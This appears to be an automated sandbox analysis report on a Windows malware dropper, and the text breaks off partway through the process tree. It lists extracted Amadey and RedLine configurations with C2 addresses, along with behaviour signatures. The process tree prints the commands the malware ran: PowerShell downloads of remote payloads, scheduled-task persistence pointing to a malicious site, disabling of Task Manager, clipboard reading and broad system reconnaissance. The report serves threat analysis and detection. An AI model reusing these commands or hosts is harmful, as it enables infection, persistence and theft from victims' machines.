Analysis

  • max time kernel
    145s
  • max time network
    153s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240611-en
  • resource tags

    arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25-06-2024 05:00

General

  • Target

    2e20ccaacf6905db1f95bb52ecb0122c7394478e66cfa60b9b5cc8d95ced6ff5.exe

  • Size

    1.8MB

  • MD5

    9fd6bf93f18cb5a0efed0304303ffa75

  • SHA1

    a09596503df75fa9d3d7b829c303a35a4d36deb1

  • SHA256

    2e20ccaacf6905db1f95bb52ecb0122c7394478e66cfa60b9b5cc8d95ced6ff5

  • SHA512

    b9a0668db0101cc4c605ce825d521727c57db337e90727cee013e4d05c5785a6aa4235ee80ae0606a72b930bf304f3e64e1b28d5f8421fdc68be77a20a2f97bf

  • SSDEEP

    49152:CO5JQ+czwae3WzYn42j2YAtPEeVbJNH7Lmmr:COo+cs73mYT6FzZb6m

Malware Config

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

C2

http://77.91.77.81

Attributes
  • install_dir

    8254624243

  • install_file

    axplong.exe

  • strings_key

    90049e51fabf09df0d6748e0b271922e

  • url_paths

    /Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

AMA

C2

185.215.113.67:40960

Extracted

Family

redline

Botnet

LiveTraffic

C2

4.184.236.127:1110

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects Monster Stealer. 3 IoCs
  • Exela Stealer

    Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.

  • Monster

    Monster is a Golang stealer that was discovered in 2024.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 17 IoCs
  • Identifies Wine through registry keys 2 TTPs 4 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 33 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 41 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2e20ccaacf6905db1f95bb52ecb0122c7394478e66cfa60b9b5cc8d95ced6ff5.exe
    "C:\Users\Admin\AppData\Local\Temp\2e20ccaacf6905db1f95bb52ecb0122c7394478e66cfa60b9b5cc8d95ced6ff5.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1492
      • C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe
        "C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3924
        • C:\Users\Admin\AppData\Local\Temp\6.exe
          "C:\Users\Admin\AppData\Local\Temp\6.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:244
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.co/1lLub
          4⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:1904
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e3973cb8,0x7ff8e3973cc8,0x7ff8e3973cd8
            5⤵
              PID:2708
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,11406652265124651752,14980105229508855810,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1908 /prefetch:2
              5⤵
                PID:1576
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,11406652265124651752,14980105229508855810,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:3896
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,11406652265124651752,14980105229508855810,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
                5⤵
                  PID:2848
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,11406652265124651752,14980105229508855810,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
                  5⤵
                    PID:3280
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,11406652265124651752,14980105229508855810,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
                    5⤵
                      PID:3904
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,11406652265124651752,14980105229508855810,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3480
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,11406652265124651752,14980105229508855810,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
                      5⤵
                        PID:4632
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,11406652265124651752,14980105229508855810,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
                        5⤵
                          PID:4592
                        • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1896,11406652265124651752,14980105229508855810,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 /prefetch:8
                          5⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2180
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,11406652265124651752,14980105229508855810,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4260 /prefetch:1
                          5⤵
                            PID:4272
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,11406652265124651752,14980105229508855810,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1
                            5⤵
                              PID:408
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,11406652265124651752,14980105229508855810,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5388 /prefetch:2
                              5⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2944
                        • C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of WriteProcessMemory
                          PID:1648
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            4⤵
                              PID:4924
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5056
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 332
                              4⤵
                              • Program crash
                              PID:4128
                          • C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
                            3⤵
                            • Executes dropped EXE
                            PID:3888
                          • C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
                            3⤵
                            • Executes dropped EXE
                            • Drops file in Windows directory
                            • Suspicious use of WriteProcessMemory
                            PID:3644
                            • C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                              "C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
                              4⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3592
                              • C:\Users\Admin\AppData\Local\Temp\1000020001\1.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000020001\1.exe"
                                5⤵
                                • Executes dropped EXE
                                • Checks SCSI registry key(s)
                                PID:5032
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 484
                                  6⤵
                                  • Program crash
                                  PID:4828
                          • C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"
                            3⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of WriteProcessMemory
                            PID:3012
                            • C:\Windows\SYSTEM32\cmd.exe
                              cmd /c ins.bat
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2892
                              • C:\Windows\system32\schtasks.exe
                                schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
                                5⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:676
                              • C:\Windows\system32\schtasks.exe
                                schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
                                5⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:2684
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
                                5⤵
                                • Blocklisted process makes network request
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4152
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
                                5⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Modifies registry class
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:1572
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"
                                  6⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1256
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
                                    7⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:1476
                                  • C:\Windows\system32\reg.exe
                                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
                                    7⤵
                                    • Modifies registry key
                                    PID:2856
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
                                    7⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:3628
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
                                    7⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:3276
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"
                                5⤵
                                • Blocklisted process makes network request
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1912
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Corporation.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Corporation'"
                                5⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3272
                              • C:\Windows\system32\schtasks.exe
                                schtasks /query /TN "Cleaner"
                                5⤵
                                  PID:1212
                            • C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of WriteProcessMemory
                              PID:3648
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4424
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 252
                                4⤵
                                • Program crash
                                PID:536
                            • C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:3084
                              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                4⤵
                                  PID:4976
                              • C:\Users\Admin\AppData\Local\Temp\1000101001\judit.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000101001\judit.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:2928
                                • C:\Users\Admin\AppData\Local\Temp\onefile_2928_133637652944586099\stub.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000101001\judit.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:4656
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "ver"
                                    5⤵
                                      PID:2084
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                      5⤵
                                        PID:4792
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic csproduct get uuid
                                          6⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5112
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tasklist"
                                        5⤵
                                          PID:1984
                                          • C:\Windows\system32\tasklist.exe
                                            tasklist
                                            6⤵
                                            • Enumerates processes with tasklist
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5056
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
                                          5⤵
                                          • Hide Artifacts: Hidden Files and Directories
                                          PID:2896
                                          • C:\Windows\system32\attrib.exe
                                            attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
                                            6⤵
                                            • Views/modifies file attributes
                                            PID:4812
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
                                          5⤵
                                            PID:4048
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                                            5⤵
                                              PID:4604
                                              • C:\Windows\system32\taskkill.exe
                                                taskkill /F /IM chrome.exe
                                                6⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5072
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                              5⤵
                                                PID:1684
                                                • C:\Windows\system32\tasklist.exe
                                                  tasklist /FO LIST
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3832
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                                5⤵
                                                  PID:808
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe Get-Clipboard
                                                    6⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4204
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "chcp"
                                                  5⤵
                                                    PID:2164
                                                    • C:\Windows\system32\chcp.com
                                                      chcp
                                                      6⤵
                                                        PID:2180
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "chcp"
                                                      5⤵
                                                        PID:2144
                                                        • C:\Windows\system32\chcp.com
                                                          chcp
                                                          6⤵
                                                            PID:5064
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                                          5⤵
                                                            PID:3440
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              6⤵
                                                                PID:4812
                                                              • C:\Windows\system32\systeminfo.exe
                                                                systeminfo
                                                                6⤵
                                                                • Gathers system information
                                                                PID:5064
                                                              • C:\Windows\system32\HOSTNAME.EXE
                                                                hostname
                                                                6⤵
                                                                  PID:2236
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic logicaldisk get caption,description,providername
                                                                  6⤵
                                                                  • Collects information from the system
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1664
                                                                • C:\Windows\system32\net.exe
                                                                  net user
                                                                  6⤵
                                                                    PID:2692
                                                                    • C:\Windows\system32\net1.exe
                                                                      C:\Windows\system32\net1 user
                                                                      7⤵
                                                                        PID:3352
                                                                    • C:\Windows\system32\query.exe
                                                                      query user
                                                                      6⤵
                                                                        PID:1244
                                                                        • C:\Windows\system32\quser.exe
                                                                          "C:\Windows\system32\quser.exe"
                                                                          7⤵
                                                                            PID:1984
                                                                        • C:\Windows\system32\net.exe
                                                                          net localgroup
                                                                          6⤵
                                                                            PID:2416
                                                                            • C:\Windows\system32\net1.exe
                                                                              C:\Windows\system32\net1 localgroup
                                                                              7⤵
                                                                                PID:4016
                                                                            • C:\Windows\system32\net.exe
                                                                              net localgroup administrators
                                                                              6⤵
                                                                                PID:4048
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 localgroup administrators
                                                                                  7⤵
                                                                                    PID:4952
                                                                                • C:\Windows\system32\net.exe
                                                                                  net user guest
                                                                                  6⤵
                                                                                    PID:4976
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 user guest
                                                                                      7⤵
                                                                                        PID:3816
                                                                                    • C:\Windows\system32\net.exe
                                                                                      net user administrator
                                                                                      6⤵
                                                                                        PID:3140
                                                                                        • C:\Windows\system32\net1.exe
                                                                                          C:\Windows\system32\net1 user administrator
                                                                                          7⤵
                                                                                            PID:2552
                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                          wmic startup get caption,command
                                                                                          6⤵
                                                                                            PID:4632
                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                            tasklist /svc
                                                                                            6⤵
                                                                                            • Enumerates processes with tasklist
                                                                                            PID:808
                                                                                          • C:\Windows\system32\ipconfig.exe
                                                                                            ipconfig /all
                                                                                            6⤵
                                                                                            • Gathers network information
                                                                                            PID:3008
                                                                                          • C:\Windows\system32\ROUTE.EXE
                                                                                            route print
                                                                                            6⤵
                                                                                              PID:564
                                                                                            • C:\Windows\system32\ARP.EXE
                                                                                              arp -a
                                                                                              6⤵
                                                                                                PID:2692
                                                                                              • C:\Windows\system32\NETSTAT.EXE
                                                                                                netstat -ano
                                                                                                6⤵
                                                                                                • Gathers network information
                                                                                                PID:1068
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc query type= service state= all
                                                                                                6⤵
                                                                                                • Launches sc.exe
                                                                                                PID:3832
                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                netsh firewall show state
                                                                                                6⤵
                                                                                                • Modifies Windows Firewall
                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                PID:3524
                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                netsh firewall show config
                                                                                                6⤵
                                                                                                • Modifies Windows Firewall
                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                PID:3508
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                                                              5⤵
                                                                                                PID:1368
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh wlan show profiles
                                                                                                  6⤵
                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                  PID:4616
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                5⤵
                                                                                                  PID:4608
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    6⤵
                                                                                                      PID:2236
                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                      wmic csproduct get uuid
